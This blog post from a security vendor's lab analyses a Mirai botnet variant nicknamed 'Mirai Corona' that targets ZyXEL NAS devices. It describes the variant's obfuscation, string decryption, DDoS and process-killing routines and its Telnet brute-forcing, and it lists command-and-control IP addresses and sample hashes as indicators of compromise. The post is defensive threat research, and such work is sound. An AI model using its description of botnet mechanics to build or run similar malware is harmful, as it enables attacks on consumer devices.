How are Mirai variants infecting the IoT landscape?

Avira Protection Labs, 2 weeks ago 4 min read

That malware evolves is nothing new, but some evolve more than others. Particularly Mirai.

We’ve previously looked at how Mirai, an IoT botnet has changed since its source code became public, and recent analysis of IoT attacks and malware trends show that Mirai has continued it evolution. The result is an increase in attacks, using Mirai variants, as unskilled attackers create malicious botnets with relative ease.

The Avira IoT honeypot recently captured samples that are modified variants of Mirai. Our initial analysis found that these malware samples were similar to Mirai with a small, obvious change: using “CORONA” as a string in “/bin/busybox CORONA” command. Therefore, the IoT researchers at Avira named this new Mirai variant as ‘Mirai Corona‘.

In the screenshot below, you can see the attacker links this Mirai variant with the Corona pandemic, suggesting that “Total lockdown is the solution”. Under the hood, it is still Mirai, just a new variant that targets NAS devices (ZyXEL NAS exploiting CVE-2020-9054).

This blog will present a detailed analysis on how this new variant of Mirai is exploiting the vulnerabilities found in the IoT landscape, along with new C&C servers.

Analysis of the Mirai variant

The core functionality of Mirai do not change in this version. However, we observed few changes that are worth mentioning:

Notable features:

  • Different Control Flow Obfuscation
  • Custom encryption/decryption technique
  • Packets construction via C&C servers info and anti DDOS capabilities

Different control flow obfuscation

Instead of using simple fork technique, the new Mirai variant uses very different kind of Control Flow Obfuscation. The main section of the code calling encryptionhandle is entirely different code block. rt_sigaction is used to control flow obfuscation. This system call is used to change the action taken after receipt of a specific signal.

Custom encryption/decryption technique

In the image below, the Mirai variant can be seen communicating with C&C, but prior communicating with C&C, it decrypts some strings (commands and credentials). Instead of using simple xor, it uses a custom routine.

After initialization and string decryption, the variant starts communicating with its C&C server.

Anti DDOS capabilities and packet construction

The botnet has attack_parsing() function that sets DDOS attack mechanics such as, UDP, TCP, UDPbypass and TCPbypass along with C&C command strings information sent by a C&C server (SYN flag, ACK flag, URG flag, RST flag, time, destination port, header length) for packet construction.

Further, it can be seen that this botnet has anti DDOS defense capabilities through TCPbypass and UDPbypass attack routines which is different from other normal sample.

Below are the images of call graph for TCPbypass and UDPbypass and packet construction in attack_parsing() function :

On the other side, the usual activities that we see is that it communicates with /dev/watchdog to prevent watchdog from rebooting the device.

The Mirai variant uses cleaner_get_name()killer_kill_by_cmdline and killer_kill_by_permission functions that allows the botnet to kill processes by specific strings, process command line and permission respectively. Furthermore, it binds to the TCP port 28341 to ensure single instance running on an infected device. The botnet scans the TCP port 23 of random hosts for brute-forcing and phone back to its C&C server once login attempt becomes successful.

Once the malware is up, it sends a beacon to a C&C server at a specific port, notifying the C&C that it is now ready for command to execute on the device. During our analysis, we found the following C&C servers:

  • 104[.]218.50.89
  • 167[.]86.126.28
  • 185[.]125.230.11
  • 84[.]196.75
  • 148[.]120.105

Conclusion

It is important to safeguard IoT endpoints installed in consumer environments. it is the industry’s responsibility, and the the responsibility of the consumer, to ensure that their IoT devices are reliable products, have strong authentication credentials and they are regularly patched.

the Avira IoT Research team monitors such new malware families or variants and provide detections for them. Integrating Avira SafeThings and anti-malware technologies can help protect customers from such attacks.

IoCs

List of different Mirai variants:

Sample hash (Sha256) Source Executable Format Target Architecture Debugging Info
013ca1e05699062db31011d73c217ed3d2aa543ff16e43fb3886dd98202b26ab Honeypot ELF 32-bit LSB executable ARM stripped
0584cbbec12e87d576a7379e8940b4040cdb8d6a2c4d3956b482960347bdb90a Honeypot ELF 32-bit LSB executable ARM stripped
08a74b717b01f42221fad7b2dc1e9d918283c680d6d3c6c85f2af929645475eb Honeypot ELF 32-bit LSB executable ARM stripped
09fdad7129c182457b8c3b9e4f25a9c741e61cfe809301f44e13f77cfb3462e6 Honeypot ELF 32-bit LSB executable ARM stripped
0be67ed20c038a2aac9e2f7733df4c005c8b8f0974cc8add170d211657aad106 Honeypot ELF 32-bit LSB executable ARM stripped
12bd8ea2aa201703fb59f49d48d4d9488f62c66c763c077013ccac0ed2ca5f1e Honeypot ELF 32-bit LSB executable ARM stripped
167c0e763c3f998890a7d16f680283e8800d096e09273e58539236533047d473 Honeypot ELF 32-bit LSB executable ARM stripped
17fc8cae53461774c2db746472adbf66ab4c2cdd41a1fd761052ef9e28fdd8f8 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
1ea9bb247a4ec60242847f572ef0384c80b014fa972f4fa5cb6373a7ab1b0de8 VirusTotal ELF 32-bit LSB executable ARM stripped
284e35bcaa498d885f366107025f06ef14b0358621889c73b640eae031225588 VirusTotal ELF 32-bit MSB executable MIPS stripped
3308ebcd96bd42e15128fa68db7be71004b5f406f214c3d3d6c202883034d252 VirusTotal ELF 32-bit LSB executable ARM stripped
346100885bfcfbb3f6995150ef21cfd905ade6485d1db304462d07810367032e VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
34fe6476bbbd1c357119cc137c42eaed1ad96d72dfb07be5a252dbac827d49f0 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
3c41de8bcf24966f383eca595617d93c3e112fcb20b37b3c03e0aaa5e24839f6 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
3fc6d131685d84cda3791de96a9b10918b9a310467236b4216ad10f98abbe3f4 VirusTotal ELF 32-bit MSB executable Motorola m68k stripped
4717e940f41ed3d377dfb95ec0092400b26d5c8101603c13bce390a92a7c0d83 VirusTotal ELF 32-bit LSB executable ARM stripped
3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
48aabb4ac83cebe9aec6af359a2e10af0ed112fc3936f8c4149a3838e6dfc426 VirusTotal ELF 32-bit MSB executable MIPS stripped
575a28ca439411a40d8cf0f381c6f0c1889a8a08627d2135ff28b9dfd8e2dc6c VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
6a651d67be24382c9328b6de7829dc861a6958ff38e4260abb35e16b8f60666a VirusTotal ELF 32-bit LSB executable ARM stripped
6e533d390048e1bb3157c0aa6a429195698515cf2bcd99fb2276d202a2e6c2c4 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
6f8026820c63c92e610de15e771e8d00826bd5050a3c4b06210e23f6fc68868b VirusTotal ELF 32-bit LSB executable ARM stripped
7854e35610ead6f1010ccd1858c6b6ecb19c34c149c6326c10e7016202767711 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
8851b330a6bf5d2efade40a0262553e2a57bc3d3416f4f29f9f7bd1e5634edcb VirusTotal ELF 32-bit MSB executable SPARC stripped
8ca2c4c8236f159d55ee2160ed20bc69b51f93990898e6ecfea506ff3cdeca4a VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
8ca3f4dd7ad0d01f3cd6a34fa060af33c3c840ccf6f368f294f0e50f380ec52f VirusTotal ELF 32-bit LSB executable MIPS stripped
93b75a6f4d1e6880d1dd08de14137a1685be0cf70dae05b89f74d3c83820a7ef VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
9b45260b5b5157a70dd7d8835b88b503f091f4ca1b64d7518843f41e14f986d7 VirusTotal ELF 32-bit MSB executable MIPS stripped
9bf2754afc362510ece8cfaa6062c70e4aee001ab2fd011f7a01dc35399db495 VirusTotal ELF 32-bit LSB executable ARM stripped
a07d2c5c94a8048205cd24cff34195e3eed1534044772386b7b94a9e84f8ea2c VirusTotal ELF 32-bit LSB executable ARM stripped
aa4caeb4f22998fdb7bb5a77e6cb75f9ddc5f598902c5f4f26842d060af08a37 VirusTotal ELF 32-bit LSB executable ARM stripped
aede29b4914344f00998d2e3183d005bee886a81f0e430536cf0a842ecdde4bd VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
b37d62fb74bf89921dbbdcea8bb8f5a85bc4b2bbf002146c651921bdbf96e745 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde VirusTotal ELF 32-bit LSB executable ARM with debug_info
ca957197780b9e40d550828024377888130735c31815716106b0be65b80c51f1 VirusTotal ELF 32-bit LSB executable MIPS stripped
cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08 VirusTotal ELF 32-bit LSB executable ARM with debug_info
d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped
dc65a17134774b13b898af7af3197fdab765de8770d92fdf2967dc9d382b0a08 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
e226bc964e31fb835ea2ae5fcd697d16a6e693557bf46bda43d0bf71f151d6c1 VirusTotal ELF 32-bit LSB executable MIPS stripped
e25521b6d5c974a8844d55a7f67b9ad6fc15129a7d6988695c01f25da06e9308 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
e7f8389e88e6d336666ca9572829e88fddcdd2ceb532a305effaaff8514769cd VirusTotal ELF 32-bit LSB executable Intel 80386 stripped
e9dfa336a668c6d33352860d9443062446af41239edb0c6a9ec49213a6713534 VirusTotal ELF 32-bit LSB executable MIPS stripped

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.
How are Mirai variants infecting the IoT landscape?

Avira Protection Labs

Protection Lab is the heart of Avira’s threat detection and protection unit. The researchers at work in the Labs are some of the most qualified and skilled anti-malware researchers in the security industry. They conduct highly advance research to provide the best detection and protection to nearly a billion people world-wide.

You might like